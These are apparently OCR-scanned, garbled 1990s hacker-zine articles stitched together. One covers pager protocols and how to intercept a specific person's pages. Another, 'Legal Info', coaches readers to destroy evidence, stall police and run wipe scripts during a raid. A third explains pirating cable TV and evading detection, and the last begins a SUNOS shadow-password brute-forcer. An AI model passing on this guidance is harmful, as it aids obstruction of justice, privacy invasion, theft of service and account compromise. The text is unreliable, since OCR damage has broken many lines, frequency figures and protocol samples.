fax reception notification, and email. Of course, all of these services 
are available for a small additional monthly premium. 


Email is probably the single coolest thing to have sent to your 
alpha pager. (Unless you subscribe to about a zillion mailing lists) 
Companies like SkyTel and Radiomail give the user an email address 
that automatically forwards to your paging device. 

IE: PIN-NUMBER@skymail.com. Several packages exist for forwarding 
email from a UNIX system by sending stripping down the email to 
pertinent info such as FROM and SUBJECT lines, and executing a script 
to send the incoming mail out via a pager terminal data port. 

One such program is IXOBEEPER, which can be found with an archie 
query. 


Radiomail’s founder, (and rather famous ex-hacker in his own right - go 
look at ancient ComputerWorld headlines), Geoff Goodfellow had devised 
such a method back in the late 70’s. His program watched for incoming 
email, parsed the mail headers, and redirected the FROM and SUBJECT 
lines to his alphanumeric pager. Obviously, not many people had 
alphanumeric pagers at all, much less email addresses on ARPANET 

back in the 70’s, so Geoff’s email pager idea didn’t see much 
wide-spread use until much later. 


Two RFC’s have been issued recently regarding paging and the Internet. 
RFC 1568, the Simple Network Paging Protocol, acts similarly to SMTP. 
Upon connecting to the SNPP port the user issues commands such as: 


PAGE followed by pager telephone number 
MESS followed by the alpha or numeric message 
SEND 

QUIT 


& 


RFC 1568 has met with some opposition in the IETF, who don’t consider 
it worthwhile to implement a new protocol to handle paging, since it 
can be handled easily using other methods. 


The other RFC, number 1569, suggests that paging be addressed in a rather 
unique manner. Using the domain TPC.INT, which would be reserved for 
services that necessitate the direct connection to The Phone Company, 
individual pagers would be addressed by their individual phone numbers. 
Usernames would be limited to pager-alpha or pager-numeric to represent 

the type of pager being addressed. For example, an alpha-page being sent to 
1-800-555-1212 would be sent as pager-alpha@2.1.2.1.5.5.5.0.0.8.1.tcp.int. 


** PAGING TERMINAL DATA PORTS ** 


Many services offer modem connections to pager terminals so that 
computer users can send pages from their desks using software packages 
like WinBeep, Notify! or Messenger. All of these services connect to 
the pager terminal and speak to it using a protocol known as 

IXO. 


Upon connection, a pager terminal identifies itself with the following: 


ID= 


(I bet you always wondered what the hell those systems were) 
Paging terminals default to 300 E71, although many larger companies 
now have dialups supporting up to 2400. 
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foll 


All terminals support the IXO protocol. 


site specific examples within the breadth of IX0O, 


the ID= prompt. 


Not every pager terminal will support a manual 


As there are far too many 


the most common type of pager services for our examples. 


ly enter in the appropriate information 
The system will 
followed by a prompt 
owed by a final prompt asking if you 


l then 


we will concentrate on 


[ Sample IXO transaction of a program sending the message ABC to PIN 123 
gleened from the IXOBeeper Docs 


Pager Terminal YOU 

<CR> 
ID= 

<ESC>PG1<CR> 
Processing -— Please Wait 

<CR> 


<CR> 
ACK <CR> 
<ESC>[p <CR> 


<CR> 
ACK <CR> 


<ESC>EOT <CR> 


The checksum data came from: 


STX 000 0010 
1 011 0001 
2 011 0010 
= 001 0011 
<CR> 000 1101 
A 100 0001 
B 100 0010 
Cc 100 0011 
<CR> 000 1101 
ETX 000 0011 

Ie OV. 07 

1 7 . Get it? 
Note: 


to generate th 


checksum. 


Get an ASCII chart and it will al 


Everything in the paging blocks, 


Also, 


<STX>123<CR> 
ABC<CR> 
<ETX>17; <CR> 


E 


<EOT><CR> 


from STX to ETX 
this is binary data, 


ll make sense. 


inclusive are used 
guys...you can’t 


just type at the ID= prompt and expect to have it recognized as IXO. 


It wants specific BITS. 


**x PAGER FREQUENCIES 


-—- US xk* 


[Frequencies transmitting pager information ar 
They identify each batch transmission 
followed by bursts of data. 


identify while scanning. 
with a two-tone signal, 


Got it? 


Just checking... 


xtremely easy to 


People with 


scanners may tune into some of the following frequencies to 
familiarize themselves with this distinct audio.] 


Voice Pager Ranges: 


152.01 
453.025 


-— 152 
= 453 


w2d 
wD 
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454.025 - 454.65 
462.75 = #62925 
Other Paging Ranges: 35.202 - 35.68 
43.20 - 43.68 
T5251 - 152.84 
LO hy - 158.07 
158.49 - 158.64 


459.025 - 459.625 
929.0125. = 93129875 


** PAGER FREQUENCIES - WORLD ** 


Austria 162.050 - 162.075 T,N,A 
Australia 148.100 - 166.540 T,N,A 
411.500 —- 511.500 T,N,A 
Canada 929025: = 981-975 T,N,A 
138-0025) = V7. 975 T,N,A 
406.025 -—- 511.975 T,N,A 
China SZ 2000" = dih2e SS N,A 
Denmark 469.750 N,A 
Finland 450.225 T,N,A 
146.275 - 146.325 T,N,A 
France 466.025 -—- 466.075 T,N,A 
Germany 465.970 —- 466.075 T,N,A 
173.200 T,N,A 
Hong Kong 172.525 N,A 
280.0875 T,N,A 
Indonesia T5L.275> = °153::050 A 
Ireland 153.000 - 153.825 T,N,A 
Italy 466.075 T,N,A 
161.175 T,N 
Japan 278.1625 -— 283.8875 T,N 
Korea 146.320 - 173.320 T,N,A 
Malaysia POZeLO, = 12.525 N,A,V 
937...93;75 N,A 
Netherlands 156.9865 —- 164.350 T,N,A 
New Zealand 157.925 - 158.050 T,N,A 
Norway 148.050 - 169.850 T,N,A 
Singapore 161.450 N,A 
931.9395 N,A 
Sweden 169.8 T,N,A 
Switzerland 149.5 T,N,A 
Taiwan 166.775 N,A 
280.9375 N,A 
Thailand 450.525 N,A 
172.525 - 173.475 N,A 
UK 1382150 — 153.275 T,N,A 
454.675 —- 466.075 T,N,A 
T = Tone 
N = Numeric 
A = Alphanumeric 
V = Voice 


** INTERCEPTION AND THE LAW ** 


5 


For many years the interception of pages was not considered an 
invasion of privacy because of the limited information provided 
by the tone-only pagers in use at the time. In fact, when 
Congress passed the Electronic Communications Privacy Act in 1986 
tone-only pagers were exempt from its provisions. 


According to the ECPA, monitoring of all other types of paging signals, 
including voice, is illegal. But, due to this same law, paging 
transmissions are considered to have a reasonable expectation to 
privacy, and Law Enforcement officials must obtain a proper court 
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order to intercept them, or have the consent of the subscriber. 


To intercept pages, many LE-types will obtain beepers programmed with 
the same capcode as their suspect. To do this, they must contact 

the paging company and obtain the capcode associated with the person 
or phone number they are interested in. However, even enlisting 

the assistance of the paging companies often requires following 
proper legal procedures (warrants, subpoenas, etc.). 


More sophisticated pager-interception devices are sold by a variety 
of companies. SWS Security sells a device called the "Beeper Buster" 
for about $4000.00. This particular device is scheduled as 

a Title III device, so any possession of it by someone outside 

a law enforcement agency is a federal crime. Greyson Electronics 
sells a package called PageTracker that uses an ICOM R7100 

in conjunction with a personal computer to track and decode pager 
messages. (Greyson also sells a similar package to decode 

AMPS cellular messages from forward and reverse channels called 
"CellScope."™) 


For the average hacker-type, the most realistic and affordable option 

is the Universal M-400 decoder. This box is about 400 bucks and 

will decode POCSAG at 512 and 1200, as well as GOLAY (although I’ve never 
seen a paging service using GOLAY.) It also decodes CTCSS, DCS, DTMF, 
Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX. Te 

takes audio input from any scanners external speaker jack, and 

is probably the best decoder available to the Hacker/HAM for the price. 


Output from the M400 shows the capcode followed by T, N or A (tone, numeric 
or alpha) ending with the message sent. Universal suggests hooking 

the input to the decoder directly to the scanner before any de-emphasis 
circuitry, to obtain the true signal. (Many scanners alter the audio 
before output for several reasons that aren’t really relevant to this 
article...they just do. :) ) 


Obviously, even by viewing the pager data as it streams by is of little 

use to anyone without knowing to whom the pager belongs to. Law Enforcement 
can get a subpoena and obtain the information easily, but anyone else 

is stuck trying to social engineer the paging company. One other alternative 
works quite well when you already know the individuals pager number, 

and need to obtain the capcode (for whatever reason). 


Pager companies will buy large blocks in an exchange for their customers. 
It is extremely easy to discover the paging company from the phone number 
that corresponds to the target pager either through the RBOC or by paging 
someone and asking them who their provider is when they return your call. 
Once the company is known, the frequencies allocated to that company 

are registered with the FCC and are public information. Many CD-ROMs 

are available with the entire FCC Master Frequency Database. 

(Percon sells one for 99 bucks that covers the whole country - 
716-386-6015) Libraries and the FCC itself will also have this information 
available. 


With the frequency set and a decoder running, send a page that will be 
incredibly easy to discern from the tidal wave of pages spewing 
forth on the frequency. (6666666666, THIS IS YOUR TEST PAGE, etc...) 
It will eventually scroll by, and presto! How many important people 
love to give you their pager number? 


**x THE FUTURE ** 


With the advent of new technologies pagers will becom ven mor 
present in both our businesses and private lives. Notebook computers 
and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards. 
Some of these cards have actual screens that allow for use without the 
computer, but most require a program to pull message data out. These 
cards also have somewhat large storage capacity, so the length of 
messages have the option of being fairly large, should the service 
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provider allow them to be. 


With the advent of 8-bit alphanumeric services, users with PCMCIA pagers 
can expect to receive usable computer data such as spreadsheet 

entries, word processing documents, and of course, GIFs. (Hey, porno 
entrepreneurs: beeper-porn! Every day, you get a new gif sent to your 
pagecard! Woo Woo. Sad thing is, it would probably sell.) 


A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A 
Roaming Computer) was one of the first to allow for such broadcasts. 
EMBARC makes use of a proprietary Motorola protocol, rather than 
POCSAG, so subscribers must make use of either a Motorola NewsStream 
pager (with nifty serial cable) or a newer PCMCIA pager. Messages ar 
sent to (and received by) the user through the use of special client 
software. 


The software dials into the EMBARC message switch accessed through 
AT&T’s ACCUNET packet-switched network. The device itself is used 
for authentication (most likely its capcode or serial number) 

and some oddball protocol is spoken to communicate with the switch. 


Once connected, users have the option of sending a page out, or 
retrieving pages either too large for the memory of the pager, or 
from a list of all messages sent in the last 24 hours, in case the 
subscriber had his pager turned off. 


Additionally, the devices can be addressed directly via x.400 
addresses. (X.400: The CCITT standard that covers email address 
far too long to be worth sending anyone mail to.) So essentially, 
any EMBARC customer can be contacted from the Internet. 


MTEL, the parent company of the huge paging service SkyTel, is 
implementing what may be the next generation of paging technologies. 

This service, NWN, being administrated by MTEL subsidiary Destineer, 

is most often called 2-way paging, but is more accurately Narrowband-PCs. 


The network allows for the "pager" to be a transceiver. When a page 
arrives, the device receiving the page will automatically send back 

an acknowledgment of its completed reception. Devices may also 

send back some kind of "canned response" the user programs. An example 
might be: "Thanks, I got it!" or "Why on Earth are you eating up my 
allocated pages for the month with this crap?" 


MTEL’s service was awarded a Pioneers Preference by the FCC, which gave them 


access to the narrowband PCS spectrum before the auctions. This is a big 
deal, and did not go unnoticed by Microsoft. They dumped cash into the 
network, and said the devices will be supported by Chicago. (Yeah, 


along with every other device on the planet, right? Plug and Pray!) 


The network will be layed out almost identically to MTEL’s existing paging 


network, using dedicated lines to connect towers in an area to a central 
satellite up/downlink. One key difference will be the addition of 
highly somewhat sensitive receivers on the network, to pick up the ACKs 
and replies of the customer units, which will probably broadcast at 
about 2 or 3 watts. The most exciting difference will be the 

speed at which the network transmits data: 24,000 Kbps. Twenty-four 
thousand. (I couldn’t believe it either. Not only can you get your 
GIFs sent to your pager, but you get them blinding FAST!) The actual 
units themselves will most likely look like existing alphanumeric pagers 
with possibly a few more buttons, and of course, PCMCIA units will 

be available to integrate with computer applications. 


Beyond these advancements, other types of services plan on offering 
paging like features. CDPD, TDMA & CDMA Digital Cellular and ESMR 
all plan on providing a "pager-like" option for their customers. 

The mere fact that you can walk into a K-Mart and buy a pager 

off a rack would indicate to me that pagers are far to ingrained into 
our society, and represent a wireless technology that doesn’t scare 
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or confuse the yokels. Such a technology doesn’t ever really go away. 
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Legal Info 
by Szechuan Death 


OK. This document applies only to United States citizens: if 
you are a citizen of some other fascist country, don’t come whining 
to me when this doesn’t work..... =) 


Make no mistake: I’m not a lawyer. I’ve merely paid 
attention and picked up some facts that might be useful to me along 
the way. There are thr subjects that it pays to have a knowledge 
of handy: prescription drugs, medical procedures, and legal facts. 
While these may all be boring as hell, they can certainly pull your 
ass out of the fire in a pinch. 


Standard disclaimer: I make no claims about this document or 
facts contained therein. I also make no claims about their legal 
authenticity: if you want to be 100% sure, there’s a library in 


damn near every town, LOOK IT UP! 


One more thing: This document is useful for virtually 
ANYTHING. It’s effectiveness stretches far beyond computer hacking 
(although it’s worn a bit thin for serious crimes, as every cretin 
on Death Row has tried it already.....:) 


OK. Let’s say, just for the sake of argument, that you’ve 
decided to take a walk along the wild side and do something 
illegal. For our purposes, let’s say computer hacking (imagine 
that). There are many things you can do cover your legal ass, 
should your activities come to the attention of any of our various 
friendly law-enforcement agencies nationwide. 


-—- Part 1: Police Mentality 


You must understand the police, if you ever want to be able to 
thwart them and keep your freedom. Most police, to survive in 
their jobs, have developed an "Us vs. Them" attitude, which we 
should tolerate (up to a point). They use this attitude to justify 
their fascist tactics. "Us" is the police, a brotherhood that 
keeps the peace, always does right, and never snitches on each 
other, no matter what the cause. "Them" is the rest of the 
population. If "They" are not guilty of a specific crime, they 
must have done something else, and they’re doing their damndest to 
avoid getting caught. In addition, many police have cultivated an 
attitude similar to that of a 15-year-old high school punk: "I’m 
bad, I’m bad, I’m SOOOOO bad, I Am Cop, Hear Me ROAR," etc. 
Unfortunately, these people have weapons and the authority to 
support that attitude. Therefore, if the police come to your 
house, be EXTREMELY polite and subservient; now is not the time to 
start spouting your opinion about the police state in America 
today. Also, DO NOT RESIST THEM IF THEY ARREST YOU. Besides 
adding a charge of "Resisting Arrest" and/or "Assaulting an 
Officer", it can get very dangerous. The police have been trained 
in a number of suspect-control techniques, most of which involve 
twisting body parts at unnatural angles. As if this weren’t 


enough, almost all police carry guns. Start fighting and you’1ll 
get a couple broken bones, torn ligaments, or worse, a few bullet 
wounds (possibly fatal). So remember, be very meek. Show them 


that you are cowed by their force and their blustering presence, 
and this will save you a black eye or two on the way down to the 
station (from tripping and falling, of course). 
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art 2: Hacker’s Security 
CARDINAL RULE #1: Get rid of the evidence. No evidence = no 


for the prosecutor. The Novice Hacker’s Guide from LOD has an 
lent way to put this: 


Don’t be afraid to be paranoid. Remember, you *are* breaking the law. 


It doesn’t hurt to store everything encrypted on your hard disk, or 
keep your notes buried in the backyard or in the trunk of your car. 


You 


may feel a little funny, but you’ll feel a lot funnier when you when you 


meet Bruno, your transvestite cellmate who axed his family to death. 


hints: 

all your essential printouts, or burn them if they’re trash 
mber: police need no warrant to search your trash). Encrypt 
iles on your hard drive with something nasty, like PGP or RSA. 
file-wiper, NOT delete, to get rid of them when you’re done. 


And WIPE, don’t FORMAT, your floppies and other magnetic media 


(bett 
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er still, degauss them). With a little common sense and a bit 
fort, a great deal of legal headaches can be avoided. 


art 3A: Polite Entry 


Next part. You and your friends are enjoying an evening of 

g to polevault the firewall on whitehouse.com, when suddenly 
ear a knock at the door. Opening the door, you find a member 
e local police force standing outside, asking if he can come 
d ask you some questions. Now, here’s where you start to piss 
pants. If you were smart, you’ll have arranged something 
ehand where your friends (or, if there ARE no friends present, 
tomatic script) are getting rid of the evidence as shown in 

2. If you have no handy means of destroying the data 

touts, floppies, tapes, etc.), throw the whole mess into 
athtub, soak it in lighter fluid, and torch it. It’s a 

va mess to clean up, but nothing compared to latrine duty at 
nearest federal prison. 


While th vidence is being destroyed, you’re stalling the 

e. Ask to see their search warrant and IDs. Mull over each 

very one of them for at least 5 minutes. If they have none, 
screaming about your 4th Amendment rights. Most importantly: 


DON’ T 
you'r 
that 


INVITE THEM IN. They’re like vampires: if you let them in, 
e fucked. If they see anything even REMOTELY incriminating, 
constitutes probable cause for a search and they’1l be 


swarming all over your house like flies on shit. (And guess what! 


It’s 

won’t 
and r 
signe 
not w 
there 
REEF EC 


legal, because YOU LET THEM IN!) Now, be aware that this 
stall them forever: they can simply wait outside the house 
adio in a request for a search warrant, which will probably be 
d by the judge on duty at that time. Remember: "If you’re 
illing to be searched, you MUST have something to hide!" If 


are no friends assisting you, as shown above, USE THIS TIME 
TIVELY. When they get the warrant signed, that will be too 


late, 
the ji 


because you’ll hav rased/shredded/burned/hidden/etc. all 
ncriminating evidence. 
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art 3B: And Suddenly, The Door Burst In 


Now, if the police already have a search warrant, they don’t 

to knock on the door. They can simply kick the door down and 
in. If you’re there at the time, you CAN try and stall them 

own above, by asking to see their search warrant and IDs. 

may not work now, because they have you cold, hard, and dead 

ghts. And, if anything incriminating is in a place where they 
ind it, you’re fucked, because it WILL be used as evidenc 

his won’t happen to you, because you’ve already put everything 

e not using right at the moment in a safe, HIDDEN, place. 
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This leaves the computer. If you hear them kicking the door 
in, keep calm, and run a script you’ve set up beforehand to low- 
level-format the drive, wipe all hacking files, encrypt the whole 
thing, etc. If there’s any printouts or media hanging out, try and 
hide them (probably worthless anyway, but worth a try). The name 
of the game now is to minimize the damage that can be done to you. 
The less hard evidence linking you to the "crime", the less of a 
case the prosecutor will have and the better off you’ll be. 


—-— Part 4: The Arrest 


Now is the time to kick all your senses into hyper-record 
mode. For you to get processed through the system without a hitch, 
the arrest has to go perfectly, by the numbers. One small slip and 
you’re out through a loophole. Now, the police are aware of this 
and will be doing their best to see that doesn’t happen, but you 
may get lucky all the same. First of all: According to the 
Miranda Act, the police are REQUIRED BY LAW to read you your rights 
and make sure you understand them. Remember EVERY WORD THEY SAY TO 
YOU. If they don’t say it correctly, you may be able to get off on 
a technicality. 


CARDINAL RULE #2: You have the right to remain silent. 
EXERCISE IT. This cannot be stressed enough. If you need a 
reminder, listen to the first part of the Miranda Warning: 


"You have the right to remain silent. If you give up that 
right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT 
OF LAW." 


Nice ring to it, hmm? The only words coming out of your mouth 
at this point should be "I’d like to speak to my attorney, please" 
and, if applicable in your area, "I’d like to make a phone call, 
please" (remember the "please’s," see part #1 above) Nothing 
lse. There are tape recorders, video cameras, PLUS the word of a 
dozen police officers to back it all up. How’s that for an array 
of damning evidence against you? 


Then, after the ride downtown, you’1ll be booked and probably 
asked a few questions. Say nothing. You’re probably pissing your 
pants with fear at this point, and may be tempted to roll over on 

veryone you ever shook hands with in your whole life, but keep 
your calm, and KEEP QUIET. Keep asking for your attorney and/or a 
phone call, no matter WHAT threats/deals/etc. they make to you. 
Remember, they can’t legally interrogate you without your attorney 
present. You may also be tempted to show your mettle at this 
point, and give them false information, but remember one thing: If 
you lie to them, you can be convicted of perjury (a nasty offense 
itself). The best policy here is NSA: Never Say Anything. 
Remember, you never have to keep track of what you’ve said, or have 
to worry about having it used against you, if you’ve said NOTHING. 


== Rett. The Trial 


Here, we’ll assume you’ve been arrested, booked, let out on 
bail, indicted on X counts of so-and-so, etc. You’re now in the 
system. CARDINAL RULE #3: Get the best criminal defense attorney 
you can afford, preferably one with some background in the crime 
you’ve committed. No, scratch that: make that the best criminal 
defense attorney, PERIOD. It’s a helluva lot better to spend 5 
years working at McDonald’s 12 hours a day to pay back your legal 
fee, than it is to spend 5 years in the slammer getting pimped out 
nightly for a pack of menthols. Also, pay attention during the 
trial. Remember, the defense attorney is working for YOU: it’s 
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YOUR life they’re deciding, so give him every bit of information 
and help you can. You’re paying him to sort it out for you, but 
you should still keep an eye on things: if, in the middle of a 
trial, something happens (you get a killer idea, or want to jump up 
and scream "BULLSHIT!"), TELL HIM! It very well might be useful! 
Also, have him nitpick every single thing for loopholes, 


technicalities, civil rights violations, etc. It’s worth it if it 
pays off. 
Another important thing is to look good. Image is everything. 


Although you might prefer to wear heavily stained rock-band T- 
shirts, leather jackets, ratty jeans, etc. in real life, that will 
be EXTREMELY damning in the eyes of the judge/jury. They say that 
clothes make the man, and in this case it’s REALLY true: get a 
suit, comb/cut your hair, shave, etc. Make yourself look like a 
"positively respectable darling" in the eyes of the court! It’1ll 
pay off for you. (hey, it worked for Eric and Lyle Menendez) 


-—- Part 8: The Prison 


If you’re here, you’re totally fucked. Unless, by divine 
intervention, your conviction is overturned on appeal, you’d better 
clear up the next 5 years on your calendar. Apparently, you didn’t 
read closely enough, so read this every day during your long stay 
in prison, and you’ll be better equipped next time (assuming there 
IS a next time..... :) 


Remember the cardinal rules: 1) Don’t leav vidence around 
to be found. 2) KEEP CALM AND KEEP QUIET. 3) Get the best 
attorney available. If you remember these, and exercise some common 
sense and a lot of caution, you should have no problem handling any 
legal problems that come up. 


5 


Note: This is intended to be used as a handbook for defense 
from minor crimes ONLY (hacking, DWI, etc.) If you’re a career 
criminal, or you’ve murdered or raped somebody, you’re scum, and at 
least have the grace to plead "guilty". Don’t waste the tax- 
payers’ time and money with fancy legal footwork. 


Please feel fr to add anything or correct this document. 
However, if you DO add or correct something, PLEASE make sure it’s 
true, and PLEASE email me the changes so I can include them in the next 
revision of the document. My address is pstlb@acad3.alaska.edu. Happy 
hacking to all, and if this helps you avoid getting caught, so much the 
better. 3) 
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/* A Guide to Porno Boxes */ 
/* by Carl Corey */ 
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Keeping with tradition, and seeing that this is the first article in 
Phrack on cable TV descrambling, any illegal box for use in descrambling 
cable television signals is now known as a PORNO BOX. 


There are many methods that cable companies use to insure that you get 
what you pay for - and _only_ what you pay for. Of course, there are 
a 
t 


lways methods to get ’more than you pay for’. This file will discuss 
he most important aspects of these methods, with pointers to more 
detailed information, including schematics and resellers of equipment. 


Part I. How the cable company keeps you from getting signals 
A brief history 


---Older Systems---— 


Most scrambling methods are, in theory, simple. The original method 
used to block out signals was the trap method. All traps remove signals 
that are sent from the CATV head end (the CATV company’s station). The 


first method, which is rarely used anymore was the negative trap. 
Basically, every point where the line was dropped had these traps, which 


removed the pay stations from your signal. If you decided to add a pay 
station, the company would come out and remove the trap. This method was 
pretty secur you would provide physical evidence of tampering if you 


climbed the pole to remove them or alter them (sticking a pin through 
them seemed to work randomly, but could affect other channels, as it 
shifts the frequency the trap removes.) This was a very secure system, 
but did not allow for PPV or other services, and required a lot of 
physical labor (pole-climbers aren’t cheap). The only places this is 
used anymore is in an old apartment building, as one trip can service 
several programming changes. Look for a big gray box in the basement 
with a lot of coax going out. If you are going to give yourself free 
service, give some random others fr service to hide the trail. 


The next method used was termed a positive trap. With this method, the 
cable company sends a _very_ strong signal above the real signal. A 
tuner sees the strong signal, and locks onto the ’garbage’ signal. A 
loud beeping and static lines would show up on the set. For the CATV 
company to enable a station, they put a ’positive’ trap on the line, 
which (despite the name) removes the garbage signal. Many text files 
have been around on how to descramble this method (overlooking the 
obvious, buying a (cheap) notch filter), ranging from making a crude 
variable trap, to adding wires to the cable signal randomly to remove the 
Signal. This system is hardly used anymore, as you could just put a trap 
inside your house, which wouldn’t be noticed outside the house. 


---Current Systems---— 


The next advent in technology was the box. The discussion of different 
boxes follows, but there is one rather new technology which should be 
discussed with the traps. The addressable trap is the CATV’s dream. It 
combines the best features of the negative trap (very difficult to tamper 
with without leaving evidence) with features of addressable boxes (no 
lineman needs to go out to add a service, computers can process Pay Per 
View or other services). Basically, a '’smart trap’ sits on the pole and 
removes signals at will. Many systems require a small amp inside the 
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house, which the cable company uses to make sure that you don’t hook up 
more than one TV. I believe that the new CATV act makes this illegal, 
and that a customer does not have to pay for any extra sets (which do not 
need equipment) in the house. Of course, we all know that the cable TV 
company will do whatever it wants until it is threatened with lawsuits. 


Cable boxes use many different methods of descrambling. Most are not in 
use anymore, with a few still around, and a few around the corner in the 
future. The big thing to remember is sync suppression. This method is 
how the cable companies make the picture look like a really fucked up, 
waving Dali painting. Presently the most popular method is the Tri-mode 
In-band Sync suppression. The sync signal is suppressed by 0, 6, or 10 
dB. The sync can be changed randomly once per field, and the information 
necessary for the box to rebuild a sync signal. This very common system 
is discussed in Radio-Electronics magazine in the 2/87 issue. There ar 
schematics and much more detailed theory than is provided here. 


The other common method currently used is SSAVI, which is most common on 
Zenith boxes. It stands for Sync Suppression And Video Inversion. In 
addition to sync suppression, it uses video inversion to also ’scramble’ 
ie: 

s 

a 


he video. There is no sync signal transmitted separately (or reference 
ignal to tell the box how to de-scramble) as the first 26 lines (blank, 
bove the picture) are not de-synched, and can be re-synched with a 
phased lock loop - giving sync to the whole field. The data on inversion 
is sent somewhere in the 20 or 21st line, which is outside of the 

screen. Audio can be scrambled too, but it is actually just moved to a 
different frequency. Radio Electronics August 92 on has circuits and 
other info in the Drawing Board column. 


Future Systems 


For Pioneer, the future is now. The system the new Pioneers use is 
patented and Pioneer doesn’t want you to know how it works. From the 
patent, it appears to use combinations of in-band, out-band, and keys 
(also sending false keys) to scramble and relay info necessary to 
descramble. These boxes are damn slick. The relevant patents are US 
#5,113,411 and US #4,149,158 if you care to look. There is not much 
information to be gained from them. Look for future updates to this 
article with info on the system if I can find any :) 


Other systems are the VideoCipher + (used on satellites now - this is 
scary shit.) It uses DES-encrypted audio. DigiCable and DigiCipher are 
similar, with Digi encrypting the video with DES also (yikes)... And 
they all use changing keys and other methods. Oak Sigma converters use 
Similar methods which are available now on cable. (digital encryption of 
audio, etc...) 


Part II. How the cable company catches you getting those signals 


There are many methods the CATV company can use to catch you, or at 
least keep you from using certain methods. 


Market Code: Almost _all_ addressable decoders now use a market code. 
This is part of the serial number (which is used for pay 
per view addressing) which decodes to a general geographic 
region. Most boxes contain code which tell it to shut 
down if it receives a code (which can be going to any box 
on the cable system) which is from a different market area. 
So if you buy a converter that is say, market-coded for 
Los Angeles, you won’t be able to use it in New York. 


Bullets: 


he bullet is a shut down code like abov it will make 
our box say ’bAh’ and die. The method used most is for 
he head end to send messages to every box they know of 
aying ’ignore the next shutdown message’ ... and once 
very (legit) box has this info, it sends the bullet. 

he only boxes that actually process the bullet are ones 
hich the CATV system doesn’t know about. P.S. Don’t 


SHoaoaocKH 
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call the cable company and complain about cable if you 
are using an illegal converter - and be sure to warn 
anyone you live with about calling the CATV co. also. 


Leak Detection: The FCC forces all cable companies to drive around and 
look for leaks - any poor splice jobs (wiring your house 
from a neighbors without sealing it up nice) and some 
descramblers will emit RF. So while the CATV is looking 
for the leaks, they may catch you. 


Free T-Shirts: The cable company can, with most boxes, tell the box to 
display a different signal. So they can tell every box 
they know of (the legit box pool) to display a commercial 
on another channel, while the pirate boxes get this real 


cool ad with an 1800 number for free t-shirts... you call, 
you get busted. This is mostly done during PPV boxing or 
other events which are paid for - as the company knows 


exactly who should get that signal, and can catch even 
legit boxes which are modified to receive the fight. 


Your Pals: Programs like "Turn in a cable pirate and get $100" let 
you know who your friends _really_ are. 


Part III: How to get away with it. 


I get a lot of questions about opening a box that you own. This is not 

a good idea. Most, if not ALL boxes today have a tamper sensor. If you 
open the box, you break a tab, flip a switch, etc... This disables the 
box and leaves a nice piece of evidence for the CATV co. to show that you 
played with it. 


I also have had questions about the old "unplug the box when it is 
enabled, then plug it back in later"... The CATV company periodically 
sends a signal to update all the boxes to where they should be. If you 
want to do this, you’ll need to find out where the CATV sends the address 
information, and then you need to trap it out of the signal. So as soon 
as the fraudulent customer (let’s call him Chris) sees his box get the 
signal to receive the PPV porn channel, he installs the trap and now his 
box will never get any pay per view signals again... but he’1l always 
have whatever he was viewing at the time he put the trap in. Big problem 
here is that most _newer_ systems also tell the box how long it can 
descramble that channel - i.e. "Watch SPICE until I tell you not to, or 3 
hours have passed"... 


Where to make/buy/get porno boxes: 


You can order a box which has been modified not to accept bullets. This 
method is pretty expensive. You can also get a ’pan’ descrambler - it is 
a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and 
descrambles it. These boxes can’t be killed by the bullets, and work 
pretty well. There are some pans which are made by the same company as 
your cable box and are sensitive to bullets, so beware. 


There are two basic ideas for modifying a box (provided you get detailed 
instructions on how to get it open, or how to fix it once you open it). 
You can change the S/N to something which is known as ’universal’ or 
disassemble the code and remove the jump to the shutdown code. 

The universal codes are rare, and may be extinct. Besides, if the cable 
company finds out your code, they can nuke it. This happens when someon 
who makes (err made) /’universal’ chips gets busted. The modification of 
the actual code is the best way to do it, just forcing a positive 
response to permission checks is the easiest way. 


A 'cube’ is not a NeXT, it’s a device which removes the data signal from 
the cable line, and inserts a /’/nice’ data signal which tells your box to 
turn everything on. A ’destructive’ cube actually re-programs all the 
boxes below it to a new serial number and gives that number full 
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Disclaimer 


The following text is for educational purposes only and I strongly suggest 
that it is not used for malicious purposes....yeah right! 


Introduction 


Ok, I decided to release this phile to help out all you guys who wish to 
start hacking unix. Although these programs should compile & run 

on your system if you follow the instructions I have given, knowing a bit 
of C will come in handy if things go wrong. Other docs I suggest you read 
are older ’phrack’ issues with shooting sharks various articles on unix, 
and of course, ’Unix from the ground up’ by The Prophet. 


This article includes three programs, a SUNOS Brute force Shadow password 
file cracker, The Ultimate Login Spoof, and a Unix Account Validator. 


Shadow Crack 


SUNOS Unix brute force shadow password file cracker 


Well, a while back, I saw an article in phrack which included a brute force 
password cracker for unix. This was a nice idea, except that these days 
more and more systems are moving towards the shadow password scheme. This, 
for those of you who are new to unix, involves storing the actual encrypted 
passwords in a different file, usually only accessible to root. A typical 
entry from a System V R4 password file looks like this :- 


root:x:0:1:Sys. admin:/:/bin/sh 


with the actual encrypted password replaced by an ’x’ in the /etc/passwd 
file. The encrypted password is stored in a file(in the case of sysV) 
called /etc/shadow which has roughly the following format :- 


root: XyfgFekj95Fpq::::: 


this includes the login i.d., the encrypted password, and various other 
fields which hold info on password ageing etc...(no entry in the other 
fields indicate they are disabled). 


Now this was fine as long as we stayed away from system V’s, but now a 
whole load of other companies have jumped on the bandwagon from IBM (aix) 
to Suns SUNOS systems. The system I will be dealing with is SUNOS’s 
shadowed system. Now, like sysV, SUNOS also have a system whereby th 


11.txt Wed Apr 26 09:43:40 2017 2 


actual encrypted passwords are stored in a file usually called 
/etc/security/passwd.adjunct, and normally this is accessible only by root. 
This rules out the use of brute force crackers, like the one in phrack 
quite a while back, and also modern day programs like CRACK. A typical 
/etc/passwd file entry on shadowed SUNOS systems looks like this :- 


root: ##root:0:1:System Administrator:/:/bin/csh 


with the ’shadow’ password file taking roughly the same format as that of 
Sys V, usually with some extra fields. 


However, we cannot use a program like CRACK, but SUNOS also supplied a 
function called pwdauth(), which basically takes two arguments, a login 
name and decrypted password, which is then encrypted and compared to the 
appropriate entry in the shadow file, thus if it matches, we have a valid 
i.d. & password, if not, we don’t. 


I therefore decided to write a program which would exploit this function, 
and could be used to get valid i.d’s and passwords even on a shadowed 
system! 


To my knowledge the use of the pwdauth() function is not logged, but I could 
be wrong. I have left it running for a while on the system I use and it has 
attracted no attention, and the administrator knows his shit. I have seen 
the functions getspwent() and getspwnam() in Sys V to manipulate the 

